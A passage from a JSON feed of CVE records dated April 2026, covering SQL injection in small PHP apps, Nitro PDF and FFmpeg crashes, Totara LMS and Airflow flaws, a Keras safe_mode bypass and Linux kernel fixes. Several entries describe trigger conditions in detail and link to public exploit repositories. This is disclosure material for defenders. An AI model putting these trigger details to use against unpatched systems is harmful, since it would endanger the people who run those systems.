v8.3.2.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://grokability.com","http://snipe-it.com","https://github.com/grokability/snipe-it/commit/b6d397bcca4e8a05176b782de769d7160058bfc4#diff-7fe056d76c09808dac923c4639161d587c3fff281a01122f3e10c4a781674a65","https://github.com/mikust/CVEs/tree/main/CVE-2025-63743"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-66769","summary":"A NULL pointer dereference in Nitro PDF Pro for Windows v14.41.1.4 allows attackers to cause a Denial of Service (DoS) via a crafted XFA packet.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02032,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://jeroscope.com/advisories/2025/jero-2025-015/","https://www.gonitro.com/"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-69624","summary":"Nitro PDF Pro for Windows 14.41.1.4 contains a NULL pointer dereference vulnerability in the JavaScript implementation of app.alert(). When app.alert() is called with more than one argument and the first argument evaluates to null (for example, app.alert(app.activeDocs, true) when app.activeDocs is null), the engine routes the call through a fallback path intended for non-string arguments. In this path, js_ValueToString() is invoked on the null value and returns an invalid string pointer, which is then passed to JS_GetStringChars() without validation. Dereferencing this pointer leads to an access violation and application crash when opening a crafted PDF.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02056,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://nitro.com"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-69627","summary":"Nitro PDF Pro for Windows 14.41.1.4 contains a heap use-after-free vulnerability in the implementation of the JavaScript method this.mailDoc(). During execution, an internal XID object is allocated and then freed prematurely, after which the freed pointer is still passed into UI and logging helper functions. Because the freed memory region may contain unpredictable heap data or remnants of attacker-controlled JavaScript strings, downstream routines such as wcscmp() may process invalid or stale pointers. This can result in access violations and non-deterministic crashes.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00373,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://nitro.com","https://jeroscope.com/advisories/2025/jero-2025-016/"],"published_time":"2026-04-13T16:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6182","summary":"A vulnerability was identified in code-projects Simple Content Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /web/admin/login.php. Such manipulation of the argument User leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/Xmyronn/simple-cms-sqli-login-bypass-CVE-HUNT-","https://vuldb.com/submit/797263","https://vuldb.com/vuln/357105","https://vuldb.com/vuln/357105/cti"],"published_time":"2026-04-13T15:17:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6183","summary":"A security flaw has been discovered in code-projects Simple Content Management System 1.0. Affected by this issue is some unknown functionality of the file /web/index.php. Performing a manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/Xmyronn/simple-cms-sqli-id-parameter","https://vuldb.com/submit/797264","https://vuldb.com/vuln/357106","https://vuldb.com/vuln/357106/cti"],"published_time":"2026-04-13T15:17:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36941","summary":"Sourcecodester Online Resort Management System v1.0 is vulnerable to SQL Injection in the file /orms/admin/rooms/manage_room.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-resort-management-system/SQL-5.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36942","summary":"Sourcecodester Online Resort Management System v1.0 is vulnerable to SQL injection in the file /orms/admin/activities/manage_activity.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.0535,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/online-resort-management-system/SQL-4.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36943","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerable to SQL injection in the file /rsms/admin/repairs/manage_repair.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-2.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36944","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerale to SQL injection in the file/rsms/admin/repairs/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-1.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36945","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerable to SQL injection in the file /rsms/admin/clients/manage_client.php","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-3.md"],"published_time":"2026-04-13T15:17:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31282","summary":"Totara LMS v19.1.5 and before is vulnerable to Incorrect Access Control. The login page code can be manipulated to reveal the login form. An attacker can chain that with missing rate-limit on the login form to launch a brute force attack.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saykino/CVE-2026-31282","https://www.totara.com/"],"published_time":"2026-04-13T15:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31283","summary":"In Totara LMS v19.1.5 and before, the forgot password API does not implement rate limiting for the target email address. which can be used for an Email Bombing attack.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saykino/CVE-2026-31283","https://totara.com/"],"published_time":"2026-04-13T15:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33858","summary":"Dag Authors, who normally should not be able to execute code in the webserver context could craft XCom payload causing the webserver to execute arbitrary code. Since Dag Authors are already highly trusted, severity of this issue is Low.\n\n\nUsers are recommended to upgrade to Apache Airflow 3.2.0, which resolves this issue.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.0007,"ranking_epss":0.21359,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/airflow/pull/64148","https://lists.apache.org/thread/1npt3o2x81s0gw9tmfcv4n7p1z9hdmy0","http://www.openwall.com/lists/oss-security/2026/04/13/7"],"published_time":"2026-04-13T15:17:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30997","summary":"An out-of-bounds read in the read_global_param() function (libavcodec/av1dec.c) of FFmpeg v8.0.1 allows attackers to cause a Denial of Service (DoS) via a crafted input.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.1194,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://excellent-oatmeal-319.notion.site/CVE-2026-30997-Out-of-Bounds-Access-a7929817b9794568b2f7774397c7d65f","https://github.com/FFmpeg/FFmpeg"],"published_time":"2026-04-13T15:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30998","summary":"An improper resource deallocation and closure vulnerability in the tools/zmqsend.c component of FFmpeg v8.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input file.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.1113,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://excellent-oatmeal-319.notion.site/CVE-2026-30998-Resource-Leak-3265a71f9cca4dc58df4632ce8b60a50","https://ffmpeg.org/doxygen/7.0/zmqsend_8c_source.html","https://github.com/FFmpeg/FFmpeg/blob/master/tools/zmqsend.c"],"published_time":"2026-04-13T15:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30999","summary":"A heap buffer overflow in the av_bprint_finalize() function of FFmpeg v8.0.1 allows attackers to cause a Denial of Service (DoS) via a crafted input.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12417,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://excellent-oatmeal-319.notion.site/CVE-2026-30999-Memory-Leak-e0d88ac53e2e42c1b5ef9aa3497e27b6","https://ffmpeg.org/doxygen/7.0/zmqsend_8c_source.html","https://github.com/FFmpeg/FFmpeg/blob/master/tools/zmqsend.c","https://www.ffmpeg.org/download.html"],"published_time":"2026-04-13T15:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31281","summary":"Totara LMS v19.1.5 and before is vulnerable to HTLM Injection. An attacker can inject malicious HTLM code in a message and send it to all the users in the application, resulting in executing the code and may lead to session hijacking and executing commands on the victim's browser.","cvss":8.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.0,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saykino/CVE-2026-31281","https://www.totara.com/"],"published_time":"2026-04-13T15:17:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29628","summary":"A stack overflow in the experimental/tinyobj_loader_opt.h file of tinyobjloader commit d56555b allows attackers to cause a Denial of Service (DoS) via supplying a crafted .mtl file.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02068,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/kiyochii/CVE-2026-29628","https://github.com/kiyochii/tinyobjloader/commit/386b73bb8c1a855236beb73b11f45f7feac4e03a"],"published_time":"2026-04-13T15:17:19","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1462","summary":"A vulnerability in the `TFSMLayer` class of the `keras` package, version 3.13.0, allows attacker-controlled TensorFlow SavedModels to be loaded during deserialization of `.keras` models, even when `safe_mode=True`. This bypasses the security guarantees of `safe_mode` and enables arbitrary attacker-controlled code execution during model inference under the victim's privileges. The issue arises due to the unconditional loading of external SavedModels, serialization of attacker-controlled file paths, and the lack of validation in the `from_config()` method.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.0006,"ranking_epss":0.18735,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/keras-team/keras/commit/b6773d3decaef1b05d8e794458e148cb362f163f","https://huntr.com/bounties/7e78d6f1-6977-4300-b595-e81bdbda331c"],"published_time":"2026-04-13T15:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-66236","summary":"Before Airflow 3.2.0, it was unclear that secure Airflow deployments require the Deployment Manager to take appropriate actions and pay attention to security details and security model of Airflow. Some assumptions the Deployment Manager could make were not clear or explicit enough, even though Airflow's intentions and security model of Airflow did not suggest different assumptions. The overall security model [1], workload isolation [2], and JWT authentication details [3] are now described in more detail. Users concerned with role isolation and following the Airflow security model of Airflow are advised to upgrade to Airflow 3.2, where several security improvements have been implemented. They should also read and follow the relevant documents to make sure that their deployment is secure enough. It also clarifies that the Deployment Manager is ultimately responsible for securing your Airflow deployment. This had also been communicated via Airflow 3.2.0 Blog announcement [4].\n\n[1] Security Model:  https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html \n[2] Workload isolation:  https://airflow.apache.org/docs/apache-airflow/stable/security/workload.html \n[3] JWT Token authentication:  https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html \n[4] Airflow 3.2.0 Blog announcement:  https://airflow.apache.org/blog/airflow-3.2.0/ \n\n\n\nUsers are recommended to upgrade to version 3.2.0, which fixes this issue.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12476,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/airflow/pull/58662","https://lists.apache.org/thread/g8fyy1tkmxkkfk7tx2v6h8mvwzpyykbo","http://www.openwall.com/lists/oss-security/2026/04/13/6"],"published_time":"2026-04-13T15:17:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36947","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerable to SQL Injection in the file /rsms/admin/services/view_service.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-5.md"],"published_time":"2026-04-13T14:16:14","vendor":"oretnom23","product":"computer_and_mobile_repair_shop_management_system","version":null},{"cve_id":"CVE-2026-36946","summary":"Sourcecodester Computer and Mobile Repair Shop Management System v1.0 is vulnerable to SQL injection in the file /rsms/admin/inquiries/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.0535,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/huliangjia/bug_report/blob/main/Sourcecodester/computer-and-mobile-repair-shop-management-system/SQL-4.md"],"published_time":"2026-04-13T14:16:13","vendor":"oretnom23","product":"computer_and_mobile_repair_shop_management_system","version":null},{"cve_id":"CVE-2026-31423","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_hfsc: fix divide-by-zero in rtsc_min()\n\nm2sm() converts a u32 slope to a u64 scaled value.  For large inputs\n(e.g. m1=4000000000), the result can reach 2^32.  rtsc_min() stores\nthe difference of two such u64 values in a u32 variable `dsm` and\nuses it as a divisor.  When the difference is exactly 2^32 the\ntruncation yields zero, causing a divide-by-zero oops in the\nconcave-curve intersection path:\n\n  Oops: divide error: 0000\n  RIP: 0010:rtsc_min (net/sched/sch_hfsc.c:601)\n  Call Trace:\n   init_ed (net/sched/sch_hfsc.c:629)\n   hfsc_enqueue (net/sched/sch_hfsc.c:1569)\n   [...]\n\nWiden `dsm` to u64 and replace do_div() with div64_u64() so the full\ndifference is preserved.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/17c1b9807b8a67d676b6dcf749ee932ebaa7f568","https://git.kernel.org/stable/c/25b6821884713a31e2b49fb67b0ebd765b33e0a9","https://git.kernel.org/stable/c/4576100b8cd03118267513cafacde164b498b322","https://git.kernel.org/stable/c/b9e6431cbea8bb1fae8069ed099b4ee100499835","https://git.kernel.org/stable/c/c56f78614e7781aaceca9bd3cb2128bf7d45c3bd","https://git.kernel.org/stable/c/d0aefec1b1a1ba2c1d251028dc2c4e5b4ce1fea5"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31424","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: x_tables: restrict xt_check_match/xt_check_target extensions for NFPROTO_ARP\n\nWeiming Shi says:\n\nxt_match and xt_target structs registered with NFPROTO_UNSPEC can be\nloaded by any protocol family through nft_compat. When such a\nmatch/target sets .hooks to restrict which hooks it may run on, the\nbitmask uses NF_INET_* constants. This is only correct for families\nwhose hook layout matches NF_INET_*: IPv4, IPv6, INET, and bridge\nall share the same five hooks (PRE_ROUTING ... POST_ROUTING).\n\nARP only has three hooks (IN=0, OUT=1, FORWARD=2) with different\nsemantics. Because NF_ARP_OUT == 1 == NF_INET_LOCAL_IN, the .hooks\nvalidation silently passes for the wrong reasons, allowing matches to\nrun on ARP chains where the hook assumptions (e.g. state->in being\nset on input hooks) do not hold. This leads to NULL pointer\ndereferences; xt_devgroup is one concrete example:\n\n Oops: general protection fault, probably for non-canonical address 0xdffffc0000000044: 0000 [#1] SMP KASAN NOPTI\n KASAN: null-ptr-deref in range [0x0000000000000220-0x0000000000000227]\n RIP: 0010:devgroup_mt+0xff/0x350\n Call Trace:\n  <TASK>\n  nft_match_eval (net/netfilter/nft_compat.c:407)\n  nft_do_chain (net/netfilter/nf_tables_core.c:285)\n  nft_do_chain_arp (net/netfilter/nft_chain_filter.c:61)\n  nf_hook_slow (net/netfilter/core.c:623)\n  arp_xmit (net/ipv4/arp.c:666)\n  </TASK>\n Kernel panic - not syncing: Fatal exception in interrupt\n\nFix it by restricting arptables to NFPROTO_ARP extensions only.\nNote that arptables-legacy only supports:\n\n- arpt_CLASSIFY\n- arpt_mangle\n- arpt_MARK\n\nthat provide explicit NFPROTO_ARP match/target declarations.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/1cd6313c8644bfebbd813a05da9daa21b09dd68c","https://git.kernel.org/stable/c/3d5d488f11776738deab9da336038add95d342d1","https://git.kernel.org/stable/c/3e79374b03bf9a2f282f0eb1d0ac3776f7e0f28a","https://git.kernel.org/stable/c/dc3e27dd7d76e21106b8f9bbdc31f5da74a89014","https://git.kernel.org/stable/c/e7e1b6bcb389c8708003d40613a59ff2496f6b1f","https://git.kernel.org/stable/c/f00ac65c90ea475719e08d629e2e26c8b4e6999b"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31425","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nrds: ib: reject FRMR registration before IB connection is established\n\nrds_ib_get_mr() extracts the rds_ib_connection from conn->c_transport_data\nand passes it to rds_ib_reg_frmr() for FRWR memory registration. On a\nfresh outgoing connection, ic is allocated in rds_ib_conn_alloc() with\ni_cm_id = NULL because the connection worker has not yet called\nrds_ib_conn_path_connect() to create the rdma_cm_id. When sendmsg() with\nRDS_CMSG_RDMA_MAP is called on such a connection, the sendmsg path parses\nthe control message before any connection establishment, allowing\nrds_ib_post_reg_frmr() to dereference ic->i_cm_id->qp and crash the\nkernel.\n\nThe existing guard in rds_ib_reg_frmr() only checks for !ic (added in\ncommit 9e630bcb7701), which does not catch this case since ic is allocated\nearly and is always non-NULL once the connection object exists.\n\n KASAN: null-ptr-deref in range [0x0000000000000010-0x0000000000000017]\n RIP: 0010:rds_ib_post_reg_frmr+0x50e/0x920\n Call Trace:\n  rds_ib_post_reg_frmr (net/rds/ib_frmr.c:167)\n  rds_ib_map_frmr (net/rds/ib_frmr.c:252)\n  rds_ib_reg_frmr (net/rds/ib_frmr.c:430)\n  rds_ib_get_mr (net/rds/ib_rdma.c:615)\n  __rds_rdma_map (net/rds/rdma.c:295)\n  rds_cmsg_rdma_map (net/rds/rdma.c:860)\n  rds_sendmsg (net/rds/send.c:1363)\n  ____sys_sendmsg\n  do_syscall_64\n\nAdd a check in rds_ib_get_mr() that verifies ic, i_cm_id, and qp are all\nnon-NULL before proceeding with FRMR registration, mirroring the guard\nalready present in rds_ib_post_inv(). Return -ENODEV when the connection\nis not ready, which the existing error handling in rds_cmsg_send() converts\nto -EAGAIN for userspace retry and triggers rds_conn_connect_if_down() to\nstart the connection worker.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/23e07c340c445f0ebff7757ba15434cb447eb662","https://git.kernel.org/stable/c/450ec93c0f172374acbf236f1f5f02d53650aa2d","https://git.kernel.org/stable/c/47de5b73db3b88f45c107393f26aeba26e9e8fae","https://git.kernel.org/stable/c/6b0a8de67ac0c74e1a7df92b73c862cb36780dfc","https://git.kernel.org/stable/c/a54ecccfae62c5c85259ae5ea5d9c20009519049","https://git.kernel.org/stable/c/a5bfd14c9a299e6db4add4440430ee5e010b03ad"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31426","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: EC: clean up handlers on probe failure in acpi_ec_setup()\n\nWhen ec_install_handlers() returns -EPROBE_DEFER on reduced-hardware\nplatforms, it has already started the EC and installed the address\nspace handler with the struct acpi_ec pointer as handler context.\nHowever, acpi_ec_setup() propagates the error without any cleanup.\n\nThe caller acpi_ec_add() then frees the struct acpi_ec for non-boot\ninstances, leaving a dangling handler context in ACPICA.\n\nAny subsequent AML evaluation that accesses an EC OpRegion field\ndispatches into acpi_ec_space_handler() with the freed pointer,\ncausing a use-after-free:\n\n BUG: KASAN: slab-use-after-free in mutex_lock (kernel/locking/mutex.c:289)\n Write of size 8 at addr ffff88800721de38 by task init/1\n Call Trace:\n  <TASK>\n  mutex_lock (kernel/locking/mutex.c:289)\n  acpi_ec_space_handler (drivers/acpi/ec.c:1362)\n  acpi_ev_address_space_dispatch (drivers/acpi/acpica/evregion.c:293)\n  acpi_ex_access_region (drivers/acpi/acpica/exfldio.c:246)\n  acpi_ex_field_datum_io (drivers/acpi/acpica/exfldio.c:509)\n  acpi_ex_extract_from_field (drivers/acpi/acpica/exfldio.c:700)\n  acpi_ex_read_data_from_field (drivers/acpi/acpica/exfield.c:327)\n  acpi_ex_resolve_node_to_value (drivers/acpi/acpica/exresolv.c:392)\n  </TASK>\n\n Allocated by task 1:\n  acpi_ec_alloc (drivers/acpi/ec.c:1424)\n  acpi_ec_add (drivers/acpi/ec.c:1692)\n\n Freed by task 1:\n  kfree (mm/slub.c:6876)\n  acpi_ec_add (drivers/acpi/ec.c:1751)\n\nThe bug triggers on reduced-hardware EC platforms (ec->gpe < 0)\nwhen the GPIO IRQ provider defers probing. Once the stale handler\nexists, any unprivileged sysfs read that causes AML to touch an\nEC OpRegion (battery, thermal, backlight) exercises the dangling\npointer.\n\nFix this by calling ec_remove_handlers() in the error path of\nacpi_ec_setup() before clearing first_ec. ec_remove_handlers()\nchecks each EC_FLAGS_* bit before acting, so it is safe to call\nregardless of how far ec_install_handlers() progressed:\n\n  -ENODEV  (handler not installed): only calls acpi_ec_stop()\n  -EPROBE_DEFER (handler installed): removes handler, stops EC","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/022d1727f33ff90b3e1775125264e3023901952e","https://git.kernel.org/stable/c/808c0f156f48d5b8ca34088cbbfba8444e606cbc","https://git.kernel.org/stable/c/9c886e63b69658959633937e3acb7ca8addf7499","https://git.kernel.org/stable/c/be1a827e15991e874e0d5222d0ea5fdad01960fe","https://git.kernel.org/stable/c/d04c007047c88158141d9bd5eac761cdadd3782c","https://git.kernel.org/stable/c/f6484cadbcaf26b5844b51bd7307a663dda48ef6"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31427","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_sip: fix use of uninitialized rtp_addr in process_sdp\n\nprocess_sdp() declares union nf_inet_addr rtp_addr on the stack and\npasses it to the nf_nat_sip sdp_session hook after walking the SDP\nmedia descriptions. However rtp_addr is only initialized inside the\nmedia loop when a recognized media type with a non-zero port is found.\n\nIf the SDP body contains no m= lines, only inactive media sections\n(m=audio 0 ...) or only unrecognized media types, rtp_addr is never\nassigned. Despite that, the function still calls hooks->sdp_session()\nwith &rtp_addr, causing nf_nat_sdp_session() to format the stale stack\nvalue as an IP address and rewrite the SDP session owner and connection\nlines with it.\n\nWith CONFIG_INIT_STACK_ALL_ZERO (default on most distributions) this\nresults in the session-level o= and c= addresses being rewritten to\n0.0.0.0 for inactive SDP sessions. Without stack auto-init the\nrewritten address is whatever happened to be on the stack.\n\nFix this by pre-initializing rtp_addr from the session-level connection\naddress (caddr) when available, and tracking via a have_rtp_addr flag\nwhether any valid address was established. Skip the sdp_session hook\nentirely when no valid address exists.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/01f34a80ac23ae90b1909b94b4ed05343a62f646","https://git.kernel.org/stable/c/52fdda318ef2362fc5936385bcb8b3d0328ee629","https://git.kernel.org/stable/c/6a2b724460cb67caed500c508c2ae5cf012e4db4","https://git.kernel.org/stable/c/6e5e3c87b7e6212f1d8414fc2e4d158b01e12025","https://git.kernel.org/stable/c/7edca70751b9bdb5b83eed53cde21eccf3c86147","https://git.kernel.org/stable/c/fe463e76c9b4b0b43b5ee8961b4c500231f1a3f6"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31428","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nfnetlink_log: fix uninitialized padding leak in NFULA_PAYLOAD\n\n__build_packet_message() manually constructs the NFULA_PAYLOAD netlink\nattribute using skb_put() and skb_copy_bits(), bypassing the standard\nnla_reserve()/nla_put() helpers. While nla_total_size(data_len) bytes\nare allocated (including NLA alignment padding), only data_len bytes\nof actual packet data are copied. The trailing nla_padlen(data_len)\nbytes (1-3 when data_len is not 4-byte aligned) are never initialized,\nleaking stale heap contents to userspace via the NFLOG netlink socket.\n\nReplace the manual attribute construction with nla_reserve(), which\nhandles the tailroom check, header setup, and padding zeroing via\n__nla_reserve(). The subsequent skb_copy_bits() fills in the payload\ndata on top of the properly initialized attribute.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/52025ebaa29f4eb4ed8bf92ce83a68f24ab7fdf7","https://git.kernel.org/stable/c/7eff72968161fb8ddb26113344de3b92fb7d7ef5","https://git.kernel.org/stable/c/a2f6ff3444b663d6cfa63eadd61327a18592885a","https://git.kernel.org/stable/c/a8365d1064ded323797c5e28e91070c52f44b76c","https://git.kernel.org/stable/c/c9f6c51d36482805ac3ffadb9663fe775a13e926","https://git.kernel.org/stable/c/fc961dd7272b5e4a462999635e44a4770d7f2482"],"published_time":"2026-04-13T14:16:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31417","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/x25: Fix overflow when accumulating packets\n\nAdd a check to ensure that `x25_sock.fraglen` does not overflow.\n\nThe `fraglen` also needs to be resetted when purging `fragment_queue` in\n`x25_clear_queues()`.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/1734bd85c5e0a7a801295b729efb56b009cb8fc3","https://git.kernel.org/stable/c/4e2d1bcef78d21247fe8fef13bc7ed95885df2b5","https://git.kernel.org/stable/c/6e568835ea54a3e1d08e310e34f95d434e739477","https://git.kernel.org/stable/c/8c92969c197b91c134be27dc3afb64ab468853a9","https://git.kernel.org/stable/c/a1822cb524e89b4cd2cf0b82e484a2335496a6d9","https://git.kernel.org/stable/c/f953f11ccf4afe6feb635c08145f4240d9a6b544"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31418","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: ipset: drop logically empty buckets in mtype_del\n\nmtype_del() counts empty slots below n->pos in k, but it only drops the\nbucket when both n->pos and k are zero. This misses buckets whose live\nentries have all been removed while n->pos still points past deleted slots.\n\nTreat a bucket as empty when all positions below n->pos are unused 